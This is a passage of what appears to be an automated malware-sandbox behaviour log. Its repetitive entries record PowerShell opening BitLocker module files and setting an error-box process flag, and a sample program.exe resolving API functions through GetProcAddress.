              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7505830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6B7505830
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
